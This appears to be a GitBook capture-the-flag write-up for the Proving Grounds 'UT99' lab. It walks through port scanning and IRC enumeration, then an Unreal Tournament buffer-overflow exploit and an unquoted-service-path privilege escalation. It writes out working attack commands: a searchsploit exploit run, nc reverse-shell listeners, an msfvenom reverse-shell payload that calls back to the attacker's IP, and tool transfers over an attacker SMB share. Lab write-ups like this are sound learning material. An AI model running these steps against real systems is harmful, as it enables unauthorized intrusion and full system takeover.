📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. Proving Grounds - Practice

UT99

PreviousJackoNextSirol

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap
sudo rustscan -a 192.168.225.44 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Enumeration

IRC is running on many ports, one of those is port 6667. Let's connect to the IRC server and see what we got.

Open hexcat IRC client, and click edit.

Set the IP address of the server.

Once you're done, then connect to the server.

Let's see if there's any IRC channel, we can do that by typing /list in the left bottom corner.

And there will be a pop-up, something like this. Let's join to UT99 channel.

Upon joining, you will see a message that there's a hidden port open on 7778 and it is running Unreal Tournament.

Exploitation

It turns out Unreal Tournament has a Remote Buffer Overflow vulnerability

Let's mirror the exploit to our local machine

searchsploit -m windows/remote/16145.pl

Set a reverse shell listener

sudo nc -lvnp 80

And run the exploit

perl 16145.pl <target machine> 7778 <your ip> 80

Privilege Escalation

Let's transfer winpeas.bat via SMB, but first, let's set a temporary SMB server

sudo python /opt/impacket/examples/smbserver.py kali .

Get the IP address of your local machine

ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1

Transfer that batch file and run.

copy \\192.168.49.169\kali\winPEAS.bat
./winPEAS.bat

After some time of running, you will notice there's a service with an unquoted service path vulnerability

Check if FoxitCloudUpdateService is running as NT\SYSTEM If the output says LocalSystem, it means it does.

Check if we have start/stop permission on the service, but looks like we don't so alternatively we can restart the server.

Let's transfer accesschk.exe to the remote machine. You can get a copy here

copy \\192.168.49.169\kali\accesschk-2008-vista.exe

Check if we have write-permission.

accesschk-2008-vista.exe /accepteula -uwdq "C:\Program Files (x86)\Foxit Software\Foxit Reader"

And looks like we have a write-permission

So we have confirmed everything that this service might be vulnerable to, let's try it by creating a reverse shell first.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.169 LPORT=80 -f exe -o Foxit.exe

And transfer the shell

copy \\192.168.49.169\kali\Foxit.exe "C:\Program Files (x86)\Foxit Software\Foxit.exe"

Setup a reverse shell listener

sudo nc -lvnp 80

Restart the server

hutdown -r -t 1 && exit

After 2 to 5 mins, you should receive a shell with SYSTEM privilege.

Thanks and enjoy the rest of your day!